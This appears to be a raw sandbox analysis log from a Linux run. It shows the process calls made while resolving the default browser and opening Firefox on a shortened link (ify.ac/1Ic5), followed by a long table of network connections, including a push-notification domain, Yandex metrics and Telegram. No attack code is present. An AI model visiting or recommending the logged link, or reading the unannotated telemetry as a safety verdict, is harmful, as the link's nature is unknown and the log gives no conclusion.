[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/grep

[grep -l x-scheme-handler/https; /.local/share/applications/*.desktop]

/usr/bin/grep

[grep -l x-scheme-handler/https; /usr/local/share//applications/*.desktop]

/usr/bin/grep

[grep -l x-scheme-handler/https; /usr/share//applications/apport-gtk.desktop /usr/share//applications/bluetooth-sendto.desktop /usr/share//applications/display-im6.q16.desktop /usr/share//applications/gcr-prompter.desktop /usr/share//applications/gcr-viewer.desktop /usr/share//applications/geoclue-demo-agent.desktop /usr/share//applications/gkbd-keyboard-display.desktop /usr/share//applications/gnome-about-panel.desktop /usr/share//applications/gnome-applications-panel.desktop /usr/share//applications/gnome-background-panel.desktop /usr/share//applications/gnome-bluetooth-panel.desktop /usr/share//applications/gnome-color-panel.desktop /usr/share//applications/gnome-datetime-panel.desktop /usr/share//applications/gnome-disk-image-mounter.desktop /usr/share//applications/gnome-disk-image-writer.desktop /usr/share//applications/gnome-display-panel.desktop /usr/share//applications/gnome-initial-setup.desktop /usr/share//applications/gnome-keyboard-panel.desktop /usr/share//applications/gnome-language-selector.desktop /usr/share//applications/gnome-mouse-panel.desktop /usr/share//applications/gnome-multitasking-panel.desktop /usr/share//applications/gnome-network-panel.desktop /usr/share//applications/gnome-notifications-panel.desktop /usr/share//applications/gnome-online-accounts-panel.desktop /usr/share//applications/gnome-power-panel.desktop /usr/share//applications/gnome-printers-panel.desktop /usr/share//applications/gnome-privacy-panel.desktop /usr/share//applications/gnome-region-panel.desktop /usr/share//applications/gnome-search-panel.desktop /usr/share//applications/gnome-session-properties.desktop /usr/share//applications/gnome-sharing-panel.desktop /usr/share//applications/gnome-sound-panel.desktop /usr/share//applications/gnome-system-monitor-kde.desktop /usr/share//applications/gnome-system-panel.desktop /usr/share//applications/gnome-ubuntu-panel.desktop /usr/share//applications/gnome-universal-access-panel.desktop /usr/share//applications/gnome-users-panel.desktop /usr/share//applications/gnome-wacom-panel.desktop /usr/share//applications/gnome-wifi-panel.desktop /usr/share//applications/gnome-wwan-panel.desktop /usr/share//applications/hplj1020.desktop /usr/share//applications/ibus-setup-table.desktop /usr/share//applications/im-config.desktop /usr/share//applications/io.snapcraft.SessionAgent.desktop /usr/share//applications/libreoffice-calc.desktop /usr/share//applications/libreoffice-draw.desktop /usr/share//applications/libreoffice-impress.desktop /usr/share//applications/libreoffice-math.desktop /usr/share//applications/libreoffice-startcenter.desktop /usr/share//applications/libreoffice-writer.desktop /usr/share//applications/libreoffice-xsltfilter.desktop /usr/share//applications/nautilus-autorun-software.desktop /usr/share//applications/nm-applet.desktop /usr/share//applications/nm-connection-editor.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Emojier.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Extension.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Wayland.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Setup.desktop /usr/share//applications/org.freedesktop.Xwayland.desktop /usr/share//applications/org.gnome.Calculator.desktop /usr/share//applications/org.gnome.Calendar.desktop /usr/share//applications/org.gnome.Characters.desktop /usr/share//applications/org.gnome.DejaDup.desktop /usr/share//applications/org.gnome.DiskUtility.desktop /usr/share//applications/org.gnome.Evince-previewer.desktop /usr/share//applications/org.gnome.Evince.desktop /usr/share//applications/org.gnome.Evolution-alarm-notify.desktop /usr/share//applications/org.gnome.FileRoller.desktop /usr/share//applications/org.gnome.Logs.desktop /usr/share//applications/org.gnome.Nautilus.desktop /usr/share//applications/org.gnome.OnlineAccounts.OAuth2.desktop /usr/share//applications/org.gnome.PowerStats.desktop /usr/share//applications/org.gnome.RemoteDesktop.Handover.desktop /usr/share//applications/org.gnome.Rhythmbox3.desktop /usr/share//applications/org.gnome.Rhythmbox3.device.desktop /usr/share//applications/org.gnome.Settings.desktop /usr/share//applications/org.gnome.Shell.Extensions.desktop /usr/share//applications/org.gnome.Shell.PortalHelper.desktop /usr/share//applications/org.gnome.Shell.desktop /usr/share//applications/org.gnome.Shotwell-Viewer.desktop /usr/share//applications/org.gnome.Shotwell.Auth.desktop /usr/share//applications/org.gnome.Shotwell.desktop /usr/share//applications/org.gnome.Snapshot.desktop /usr/share//applications/org.gnome.SystemMonitor.desktop /usr/share//applications/org.gnome.Tecla.desktop /usr/share//applications/org.gnome.Terminal.Preferences.desktop /usr/share//applications/org.gnome.Terminal.desktop /usr/share//applications/org.gnome.TextEditor.desktop /usr/share//applications/org.gnome.Totem.desktop /usr/share//applications/org.gnome.Zenity.desktop /usr/share//applications/org.gnome.baobab.desktop /usr/share//applications/org.gnome.clocks.desktop /usr/share//applications/org.gnome.eog.desktop /usr/share//applications/org.gnome.evolution-data-server.OAuth2-handler.desktop /usr/share//applications/org.gnome.font-viewer.desktop /usr/share//applications/org.gnome.seahorse.Application.desktop /usr/share//applications/org.remmina.Remmina-file.desktop /usr/share//applications/org.remmina.Remmina.desktop /usr/share//applications/python3.12.desktop /usr/share//applications/remmina-gnome.desktop /usr/share//applications/rygel.desktop /usr/share//applications/simple-scan.desktop /usr/share//applications/snap-handle-link.desktop /usr/share//applications/software-properties-drivers.desktop /usr/share//applications/software-properties-gtk.desktop /usr/share//applications/software-properties-livepatch.desktop /usr/share//applications/thunderbird.desktop /usr/share//applications/transmission-gtk.desktop /usr/share//applications/update-manager.desktop /usr/share//applications/usb-creator-gtk.desktop /usr/share//applications/xdg-desktop-portal-gnome.desktop /usr/share//applications/xdg-desktop-portal-gtk.desktop /usr/share//applications/yelp.desktop]

/usr/bin/grep

[grep -q %s]

/usr/bin/x-www-browser

[x-www-browser https://ify.ac/1Ic5]

/usr/bin/xdg-settings

[xdg-settings get default-web-browser]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/xdg-mime

[xdg-mime query default x-scheme-handler/http]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/grep

[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/http= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/http= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/grep

[grep -l x-scheme-handler/http; /.local/share/applications/*.desktop]

/usr/bin/grep

[grep -l x-scheme-handler/http; /usr/local/share//applications/*.desktop]

/usr/bin/grep

[grep -l x-scheme-handler/http; /usr/share//applications/apport-gtk.desktop /usr/share//applications/bluetooth-sendto.desktop /usr/share//applications/display-im6.q16.desktop /usr/share//applications/gcr-prompter.desktop /usr/share//applications/gcr-viewer.desktop /usr/share//applications/geoclue-demo-agent.desktop /usr/share//applications/gkbd-keyboard-display.desktop /usr/share//applications/gnome-about-panel.desktop /usr/share//applications/gnome-applications-panel.desktop /usr/share//applications/gnome-background-panel.desktop /usr/share//applications/gnome-bluetooth-panel.desktop /usr/share//applications/gnome-color-panel.desktop /usr/share//applications/gnome-datetime-panel.desktop /usr/share//applications/gnome-disk-image-mounter.desktop /usr/share//applications/gnome-disk-image-writer.desktop /usr/share//applications/gnome-display-panel.desktop /usr/share//applications/gnome-initial-setup.desktop /usr/share//applications/gnome-keyboard-panel.desktop /usr/share//applications/gnome-language-selector.desktop /usr/share//applications/gnome-mouse-panel.desktop /usr/share//applications/gnome-multitasking-panel.desktop /usr/share//applications/gnome-network-panel.desktop /usr/share//applications/gnome-notifications-panel.desktop /usr/share//applications/gnome-online-accounts-panel.desktop /usr/share//applications/gnome-power-panel.desktop /usr/share//applications/gnome-printers-panel.desktop /usr/share//applications/gnome-privacy-panel.desktop /usr/share//applications/gnome-region-panel.desktop /usr/share//applications/gnome-search-panel.desktop /usr/share//applications/gnome-session-properties.desktop /usr/share//applications/gnome-sharing-panel.desktop /usr/share//applications/gnome-sound-panel.desktop /usr/share//applications/gnome-system-monitor-kde.desktop /usr/share//applications/gnome-system-panel.desktop /usr/share//applications/gnome-ubuntu-panel.desktop /usr/share//applications/gnome-universal-access-panel.desktop /usr/share//applications/gnome-users-panel.desktop /usr/share//applications/gnome-wacom-panel.desktop /usr/share//applications/gnome-wifi-panel.desktop /usr/share//applications/gnome-wwan-panel.desktop /usr/share//applications/hplj1020.desktop /usr/share//applications/ibus-setup-table.desktop /usr/share//applications/im-config.desktop /usr/share//applications/io.snapcraft.SessionAgent.desktop /usr/share//applications/libreoffice-calc.desktop /usr/share//applications/libreoffice-draw.desktop /usr/share//applications/libreoffice-impress.desktop /usr/share//applications/libreoffice-math.desktop /usr/share//applications/libreoffice-startcenter.desktop /usr/share//applications/libreoffice-writer.desktop /usr/share//applications/libreoffice-xsltfilter.desktop /usr/share//applications/nautilus-autorun-software.desktop /usr/share//applications/nm-applet.desktop /usr/share//applications/nm-connection-editor.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Emojier.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Extension.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Panel.Wayland.Gtk3.desktop /usr/share//applications/org.freedesktop.IBus.Setup.desktop /usr/share//applications/org.freedesktop.Xwayland.desktop /usr/share//applications/org.gnome.Calculator.desktop /usr/share//applications/org.gnome.Calendar.desktop /usr/share//applications/org.gnome.Characters.desktop /usr/share//applications/org.gnome.DejaDup.desktop /usr/share//applications/org.gnome.DiskUtility.desktop /usr/share//applications/org.gnome.Evince-previewer.desktop /usr/share//applications/org.gnome.Evince.desktop /usr/share//applications/org.gnome.Evolution-alarm-notify.desktop /usr/share//applications/org.gnome.FileRoller.desktop /usr/share//applications/org.gnome.Logs.desktop /usr/share//applications/org.gnome.Nautilus.desktop /usr/share//applications/org.gnome.OnlineAccounts.OAuth2.desktop /usr/share//applications/org.gnome.PowerStats.desktop /usr/share//applications/org.gnome.RemoteDesktop.Handover.desktop /usr/share//applications/org.gnome.Rhythmbox3.desktop /usr/share//applications/org.gnome.Rhythmbox3.device.desktop /usr/share//applications/org.gnome.Settings.desktop /usr/share//applications/org.gnome.Shell.Extensions.desktop /usr/share//applications/org.gnome.Shell.PortalHelper.desktop /usr/share//applications/org.gnome.Shell.desktop /usr/share//applications/org.gnome.Shotwell-Viewer.desktop /usr/share//applications/org.gnome.Shotwell.Auth.desktop /usr/share//applications/org.gnome.Shotwell.desktop /usr/share//applications/org.gnome.Snapshot.desktop /usr/share//applications/org.gnome.SystemMonitor.desktop /usr/share//applications/org.gnome.Tecla.desktop /usr/share//applications/org.gnome.Terminal.Preferences.desktop /usr/share//applications/org.gnome.Terminal.desktop /usr/share//applications/org.gnome.TextEditor.desktop /usr/share//applications/org.gnome.Totem.desktop /usr/share//applications/org.gnome.Zenity.desktop /usr/share//applications/org.gnome.baobab.desktop /usr/share//applications/org.gnome.clocks.desktop /usr/share//applications/org.gnome.eog.desktop /usr/share//applications/org.gnome.evolution-data-server.OAuth2-handler.desktop /usr/share//applications/org.gnome.font-viewer.desktop /usr/share//applications/org.gnome.seahorse.Application.desktop /usr/share//applications/org.remmina.Remmina-file.desktop /usr/share//applications/org.remmina.Remmina.desktop /usr/share//applications/python3.12.desktop /usr/share//applications/remmina-gnome.desktop /usr/share//applications/rygel.desktop /usr/share//applications/simple-scan.desktop /usr/share//applications/snap-handle-link.desktop /usr/share//applications/software-properties-drivers.desktop /usr/share//applications/software-properties-gtk.desktop /usr/share//applications/software-properties-livepatch.desktop /usr/share//applications/thunderbird.desktop /usr/share//applications/transmission-gtk.desktop /usr/share//applications/update-manager.desktop /usr/share//applications/usb-creator-gtk.desktop /usr/share//applications/xdg-desktop-portal-gnome.desktop /usr/share//applications/xdg-desktop-portal-gtk.desktop /usr/share//applications/yelp.desktop]

/usr/bin/gsettings

[gsettings get org.gnome.shell favorite-apps]

/usr/bin/grep

[grep -q 'firefox.desktop']

/usr/bin/gsettings

[gsettings get com.canonical.Unity.Launcher favorites]

/usr/bin/grep

[grep -q 'application://firefox.desktop']

/usr/bin/gsettings

[gsettings get org.mate.panel object-id-list]

/usr/bin/which

[which qdbus]

/snap/bin/firefox

[/snap/bin/firefox https://ify.ac/1Ic5]

/usr/lib/snapd/snap-seccomp

[/usr/lib/snapd/snap-seccomp version-info]

/usr/lib/snapd/snap-confine

[/usr/lib/snapd/snap-confine --base core22 snap.firefox.firefox /usr/lib/snapd/snap-exec firefox https://ify.ac/1Ic5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 1.1.1.1:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 r10.o.lencr.org udp
US 1.1.1.1:53 r10.o.lencr.org udp
GB 104.86.111.145:80 r10.o.lencr.org tcp
GB 104.86.111.145:80 r10.o.lencr.org tcp
US 1.1.1.1:53 ify.ac udp
US 1.1.1.1:53 ify.ac udp
US 172.67.211.171:443 ify.ac tcp
US 1.1.1.1:53 location.services.mozilla.com udp
US 1.1.1.1:53 location.services.mozilla.com udp
US 1.1.1.1:53 detectportal.firefox.com udp
US 1.1.1.1:53 detectportal.firefox.com udp
US 1.1.1.1:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 34.107.221.82:80 detectportal.firefox.com tcp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 1.1.1.1:53 www.mozilla.org udp
US 1.1.1.1:53 www.mozilla.org udp
US 1.1.1.1:53 www.mozorg.moz.works udp
GB 143.204.72.186:443 www.mozilla.org tcp
US 1.1.1.1:53 example.org udp
US 1.1.1.1:53 example.org udp
US 1.1.1.1:53 ipv4only.arpa udp
US 1.1.1.1:53 ipv4only.arpa udp
US 34.107.221.82:80 detectportal.firefox.com tcp
US 1.1.1.1:53 r11.o.lencr.org udp
US 1.1.1.1:53 r11.o.lencr.org udp
GB 2.18.66.17:80 r11.o.lencr.org tcp
US 1.1.1.1:53 contile.services.mozilla.com udp
US 1.1.1.1:53 contile.services.mozilla.com udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 172.67.211.171:443 ify.ac udp
US 1.1.1.1:53 spocs.getpocket.com udp
US 1.1.1.1:53 spocs.getpocket.com udp
US 1.1.1.1:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 spocs.getpocket.com tcp
US 35.190.72.216:443 location.services.mozilla.com udp
US 1.1.1.1:53 oasqi.nxt-psh.com udp
US 1.1.1.1:53 oasqi.nxt-psh.com udp
US 1.1.1.1:53 mc.yandex.ru udp
US 1.1.1.1:53 mc.yandex.ru udp
US 34.117.188.166:443 spocs.getpocket.com tcp
US 1.1.1.1:53 getpocket.cdn.mozilla.net udp
US 1.1.1.1:53 getpocket.cdn.mozilla.net udp
US 104.21.20.211:443 oasqi.nxt-psh.com tcp
RU 87.250.250.119:443 mc.yandex.ru tcp
US 34.117.188.166:443 spocs.getpocket.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 104.21.20.211:443 oasqi.nxt-psh.com udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 34.117.188.166:443 spocs.getpocket.com udp
US 1.1.1.1:53 nxt-psh.com udp
US 1.1.1.1:53 nxt-psh.com udp
US 104.21.20.211:443 nxt-psh.com tcp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 104.21.20.211:443 nxt-psh.com udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 1.1.1.1:53 o.pki.goog udp
US 1.1.1.1:53 o.pki.goog udp
GB 142.250.187.195:80 o.pki.goog tcp
US 1.1.1.1:53 img-getpocket.cdn.mozilla.net udp
US 1.1.1.1:53 img-getpocket.cdn.mozilla.net udp
GB 142.250.187.195:80 o.pki.goog tcp
US 34.120.237.76:443 img-getpocket.cdn.mozilla.net tcp
US 34.120.237.76:443 img-getpocket.cdn.mozilla.net tcp
US 34.120.237.76:443 img-getpocket.cdn.mozilla.net tcp
US 1.1.1.1:53 mc.yandex.com udp
US 1.1.1.1:53 mc.yandex.com udp
RU 87.250.250.119:443 mc.yandex.com tcp
US 1.1.1.1:53 tiles-cdn.prod.ads.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 tiles-cdn.prod.ads.prod.webservices.mozgcp.net udp
US 34.36.165.17:443 tiles-cdn.prod.ads.prod.webservices.mozgcp.net tcp
US 34.36.165.17:443 tiles-cdn.prod.ads.prod.webservices.mozgcp.net tcp
US 1.1.1.1:53 ify.ac udp
US 1.1.1.1:53 www.gloucestershirelive.co.uk udp
US 1.1.1.1:53 www.gloucestershirelive.co.uk udp
US 1.1.1.1:53 www.mozorg.moz.works udp
US 1.1.1.1:53 getpocket.com udp
US 1.1.1.1:53 getpocket.com udp
US 1.1.1.1:53 www.telegraph.co.uk udp
US 1.1.1.1:53 www.telegraph.co.uk udp
US 1.1.1.1:53 www.amazon.co.uk udp
US 1.1.1.1:53 www.amazon.co.uk udp
US 1.1.1.1:53 uk.hotels.com udp
US 1.1.1.1:53 uk.hotels.com udp
US 1.1.1.1:53 www.youtube.com udp
US 1.1.1.1:53 www.youtube.com udp
US 1.1.1.1:53 www.facebook.com udp
US 1.1.1.1:53 e8153.a.akamaiedge.net udp
US 1.1.1.1:53 www.facebook.com udp
US 1.1.1.1:53 www.reddit.com udp
US 1.1.1.1:53 www.reddit.com udp
US 1.1.1.1:53 www.bbc.co.uk udp
US 1.1.1.1:53 www.bbc.co.uk udp
US 1.1.1.1:53 www.ebay.co.uk udp
US 1.1.1.1:53 www.ebay.co.uk udp
US 1.1.1.1:53 reddit.map.fastly.net udp
US 1.1.1.1:53 gtm-uk.www.bbc.co.uk.pri.bbc.co.uk udp
US 1.1.1.1:53 e11847.a.akamaiedge.net udp
US 1.1.1.1:53 shavar.services.mozilla.com udp
US 1.1.1.1:53 shavar.services.mozilla.com udp
US 1.1.1.1:53 shavar.prod.mozaws.net udp
US 1.1.1.1:53 normandy.cdn.mozilla.net udp
US 1.1.1.1:53 normandy.cdn.mozilla.net udp
US 44.242.121.21:443 shavar.services.mozilla.com tcp
US 1.1.1.1:53 normandy-cdn.services.mozilla.com udp
US 35.201.103.21:443 normandy.cdn.mozilla.net tcp
US 1.1.1.1:53 push.services.mozilla.com udp
US 1.1.1.1:53 push.services.mozilla.com udp
US 1.1.1.1:53 autopush.prod.mozaws.net udp
US 1.1.1.1:53 autopush.prod.mozaws.net udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 1.1.1.1:53 classify-client.services.mozilla.com udp
US 1.1.1.1:53 classify-client.services.mozilla.com udp
US 1.1.1.1:53 prod-classifyclient.normandy.prod.cloudops.mozgcp.net udp
US 1.1.1.1:53 incoming.telemetry.mozilla.org udp
US 1.1.1.1:53 incoming.telemetry.mozilla.org udp
US 34.98.75.36:443 classify-client.services.mozilla.com tcp
US 1.1.1.1:53 telemetry-incoming.r53-2.services.mozilla.com udp
US 34.120.208.123:443 incoming.telemetry.mozilla.org tcp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 1.1.1.1:53 fp2e7a.wpc.phicdn.net udp
US 34.107.243.93:443 push.services.mozilla.com udp
US 1.1.1.1:53 tracking-protection.cdn.mozilla.net udp
US 1.1.1.1:53 tracking-protection.cdn.mozilla.net udp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 telemetry-incoming.r53-2.services.mozilla.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 1.1.1.1:53 firefox-settings-attachments.cdn.mozilla.net udp
US 1.1.1.1:53 firefox-settings-attachments.cdn.mozilla.net udp
US 1.1.1.1:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 time.com udp
US 1.1.1.1:53 time.com udp
US 1.1.1.1:53 www.theguardian.com udp
US 1.1.1.1:53 www.theguardian.com udp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 www.bbc.com udp
US 1.1.1.1:53 www.bbc.com udp
US 1.1.1.1:53 www.businessinsider.com udp
US 1.1.1.1:53 www.businessinsider.com udp
US 1.1.1.1:53 gtm-uk.www.bbc.com.pri.bbc.com udp
US 1.1.1.1:53 f.shared.global.fastly.net udp
US 1.1.1.1:53 theconversation.com udp
US 1.1.1.1:53 theconversation.com udp
US 1.1.1.1:53 www.mentalfloss.com udp
US 1.1.1.1:53 www.mentalfloss.com udp
US 1.1.1.1:53 www.timeout.com udp
US 1.1.1.1:53 www.smithsonianmag.com udp
US 1.1.1.1:53 www.smithsonianmag.com udp
US 1.1.1.1:53 www.timeout.com udp
US 1.1.1.1:53 slate.com udp
US 1.1.1.1:53 slate.com udp
US 1.1.1.1:53 www.gq-magazine.co.uk udp
US 1.1.1.1:53 www.gq-magazine.co.uk udp
US 1.1.1.1:53 www.refinery29.com udp
US 1.1.1.1:53 www.refinery29.com udp
US 1.1.1.1:53 m.sni.global.fastly.net udp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 1.1.1.1:53 fp2e7a.wpc.phicdn.net udp
US 1.1.1.1:53 www.independent.co.uk udp
US 1.1.1.1:53 www.stylist.co.uk udp
US 1.1.1.1:53 www.stylist.co.uk udp
US 1.1.1.1:53 www.independent.co.uk udp
US 1.1.1.1:53 ciscobinary.openh264.org udp
US 1.1.1.1:53 ciscobinary.openh264.org udp
GB 88.221.134.155:80 ciscobinary.openh264.org tcp
US 1.1.1.1:53 psyche.co udp
US 1.1.1.1:53 psyche.co udp
US 1.1.1.1:53 www.reuters.com udp
US 1.1.1.1:53 www.reuters.com udp
US 1.1.1.1:53 www.vox.com udp
US 1.1.1.1:53 www.theatlantic.com udp
US 1.1.1.1:53 www.theatlantic.com udp
US 1.1.1.1:53 www.vox.com udp
US 1.1.1.1:53 na-eu.atlanticmedia.map.fastly.net udp
US 1.1.1.1:53 n.sni.global.fastly.net udp
US 1.1.1.1:53 services.addons.mozilla.org udp
US 1.1.1.1:53 services.addons.mozilla.org udp
GB 18.245.162.105:443 services.addons.mozilla.org tcp
US 1.1.1.1:53 versioncheck-bg.addons.mozilla.org udp
US 1.1.1.1:53 versioncheck-bg.addons.mozilla.org udp
US 34.160.90.233:443 versioncheck-bg.addons.mozilla.org tcp
US 34.160.90.233:443 versioncheck-bg.addons.mozilla.org udp
US 1.1.1.1:53 addons.mozilla.org udp
US 1.1.1.1:53 addons.mozilla.org udp
US 1.1.1.1:53 prod.balrog.prod.cloudops.mozgcp.net udp
GB 13.224.132.43:443 addons.mozilla.org tcp
US 1.1.1.1:53 safebrowsing.googleapis.com udp
US 1.1.1.1:53 safebrowsing.googleapis.com udp
GB 142.250.200.10:443 safebrowsing.googleapis.com tcp
GB 142.250.187.195:80 o.pki.goog tcp
GB 142.250.200.10:443 safebrowsing.googleapis.com udp
US 172.67.211.171:443 ify.ac tcp
US 1.1.1.1:53 ify.ac udp
US 1.1.1.1:53 t.me udp
US 1.1.1.1:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 1.1.1.1:53 ocsp.godaddy.com.akadns.net udp
US 1.1.1.1:53 telegram.org udp
US 1.1.1.1:53 telegram.org udp
US 1.1.1.1:53 cdn5.cdn-telegram.org udp
US 1.1.1.1:53 cdn5.cdn-telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
US 1.1.1.1:53 ocsp.godaddy.com.akadns.net udp
US 34.111.108.175:443 cdn5.cdn-telegram.org udp
US 1.1.1.1:53 detectportal.firefox.com udp
US 1.1.1.1:53 detectportal.firefox.com udp
US 1.1.1.1:53 ipv4only.arpa udp
US 1.1.1.1:53 ipv4only.arpa udp
US 1.1.1.1:53 api.snapcraft.io udp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.58:443 api.snapcraft.io tcp
US 1.1.1.1:53 api.snapcraft.io udp
GB 185.125.188.55:443 api.snapcraft.io tcp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
